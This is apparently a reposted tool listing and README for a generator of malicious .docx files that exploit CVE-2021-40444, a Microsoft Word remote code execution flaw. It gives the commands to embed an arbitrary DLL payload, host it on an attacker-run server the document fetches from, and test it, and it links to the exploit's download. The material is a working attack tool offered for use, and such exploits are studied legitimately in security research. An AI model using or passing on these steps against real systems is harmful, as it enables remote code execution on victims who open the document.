<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="820" data-original-width="1473" height="356" src="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/w640-h356/CVE-2021-40444_3_calc.png" width="640" /></a></div> Malicious docx <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="generator">generator</a> to exploit CVE-2021-40444 (Microsoft Office Word <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="Remote">Remote</a> Code Execution)<a name='more'></a> Creation of this Script is based on some <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)You need to install lcab first (<code>sudo apt-get install lcab</code>)Check <code>REPRODUCE.md</code> for manual reproduce stepsIf your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at <code>test/calc.dll</code> which just pops a <code>calc.exe</code> from a call to <code>system()</code><code>python3 exploit.py generate test/calc.dll http://&lt;SRV IP&gt;</code> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/s1007/CVE-2021-40444_1_gen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1007" height="372" src="https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/w640-h372/CVE-2021-40444_1_gen.png" width="640" /></a></div> Once you generate the malicious docx (will be at <code>out/</code>) you can setup the server:<code>sudo python3 exploit.py host 80</code> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/s866/CVE-2021-40444_2_srv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="680" data-original-width="866" height="502" src="https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/w640-h502/CVE-2021-40444_2_srv.png" width="640" /></a></div> Finally try the docx in a <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> Virtual Machine:<a href="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="820" data-original-width="1473" height="356" src="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/w640-h356/CVE-2021-40444_3_calc.png" width="640" /></a>&nbsp; <div style="text-align: center;"><a class="kiploit-download" href="https://github.com/lockedbyte/CVE-2021-40444" rel="nofollow" target="_blank" title="Download CVE-2021-40444">Download CVE-2021-40444</a></div>

Tag

#Python3